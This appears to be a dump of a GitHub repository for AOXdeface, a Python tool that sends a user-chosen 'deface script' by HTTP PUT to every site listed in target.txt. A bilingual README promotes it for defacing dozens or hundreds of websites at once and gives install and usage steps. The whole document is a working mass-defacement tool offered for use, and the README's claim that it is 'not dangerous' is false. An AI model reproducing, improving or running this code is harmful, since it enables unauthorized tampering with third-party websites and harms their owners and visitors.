├── img
├── example
└── aox.png
├── target.txt
├── README.md
└── aox.py
/img/example:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/img/aox.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Madhav-MKNC/AOXdeface/HEAD/img/aox.png
--------------------------------------------------------------------------------
/target.txt:
--------------------------------------------------------------------------------
1 | http://your-target1.com
2 | http://your-target2.com
3 | http://your-target2.com
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AOXdeface
2 |
3 | what is AOXdeface tools?
4 | AOXdeface is a tool for defacing dozens or hundreds of sites at once,depending on the number
5 | of sites that have been determined by you, this is not dangerous, and this is only the file upload method
6 | INDONESIA:
7 | AOXdeface adalah alat untuk melakukan defacing terhadap puluhan atau ratusan situs sekaligus,
8 | tergantung pada jumlah situs yang telah ditentukan oleh kamu :V, ini tidak berbahaya,
9 | dan ini hanya metode upload file saja
10 |
11 | **screnshoot:**
12 | 
13 |
14 | **how to install and usage:**
15 |
16 | **Termux:**
17 | * `pkg install python2`
18 | * `pip2 install requests`
19 | * `pkg install git`
20 | * `git clone https://github.com/Ranginang67/AOXdeface`
21 | * `cd AOXdeface`
22 | * `python2 aox.py`
23 |
24 | **Linux:**
25 | * `apt install python` or `apt-get install python3`
26 | * `apt install python-pip` or `apt-get install python3-pip`
27 | * `pip install requests`
28 | * `apt install git`
29 | * `git clone https://github.com/Ranginang67/AOXdeface`
30 | * `cd AOXdeface`
31 | * `python aox.py` or `python3 aox.py`
32 |
33 | **NOTE:** before using this tool, put your deface script with the aox.py file, edit the file 'target.txt' and enter the target url
34 |
35 |
36 | [YOUTUBE](https://www.youtube.com/channel/UCNMD5U02GFeWLqmrl_XSPGQ)
37 | [TLEGRAM](https://t.me/Msambari)
38 |
--------------------------------------------------------------------------------
/aox.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | #-*- coding: utf-8 -*-
3 |
4 | try:
5 | import requests
6 | import os.path
7 | import sys
8 | except ImportError:
9 | exit("install requests and try again ...")
10 |
11 | banner = """
12 |
13 | █████╗ ██╗ ██╗██████╗ Author : Ms.ambari
14 | ██╔══██╗╚██╗██╔╝██╔══██╗ Date : 2018-12-01
15 | ███████║ ╚███╔╝ ██║ ██║ Tools : aoXdeface V.1.0
16 | ██╔══██║ ██╔██╗ ██║ ██║ Github : /Ranginang67
17 | ██║ ██║██╔╝ ██╗██████╔╝ youtube: Ms.ambari
18 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝
19 | """
20 |
21 | b = '\033[31m'
22 | h = '\033[32m'
23 | m = '\033[00m'
24 |
25 | def x(tetew):
26 | ipt = ''
27 | if sys.version_info.major > 2:
28 | ipt = input(tetew)
29 | else:
30 | ipt = raw_input(tetew)
31 |
32 | return str(ipt)
33 |
34 | def aox(script,target_file="target.txt"):
35 | op = open(script,"r").read()
36 | with open(target_file, "r") as target:
37 | target = target.readlines()
38 | s = requests.Session()
39 | print("uploading file to %d website"%(len(target)))
40 | for web in target:
41 | try:
42 | site = web.strip()
43 | if site.startswith("http://") is False:
44 | site = "http://" + site
45 | req = s.put(site+"/"+script,data=op)
46 | if req.status_code < 200 or req.status_code >= 250:
47 | print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script))
48 | else:
49 | print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script))
50 |
51 | except requests.exceptions.RequestException:
52 | continue
53 | except KeyboardInterrupt:
54 | print; exit()
55 |
56 | def main(__bn__):
57 | print(__bn__)
58 | while True:
59 | try:
60 | a = x("Enter your script deface name: ")
61 | if not os.path.isfile(a):
62 | print("file '%s' not found"%(a))
63 | continue
64 | else:
65 | break
66 | except KeyboardInterrupt:
67 | print; exit()
68 |
69 | aox(a)
70 |
71 | if __name__ == "__main__":
72 | main(banner)
73 |
--------------------------------------------------------------------------------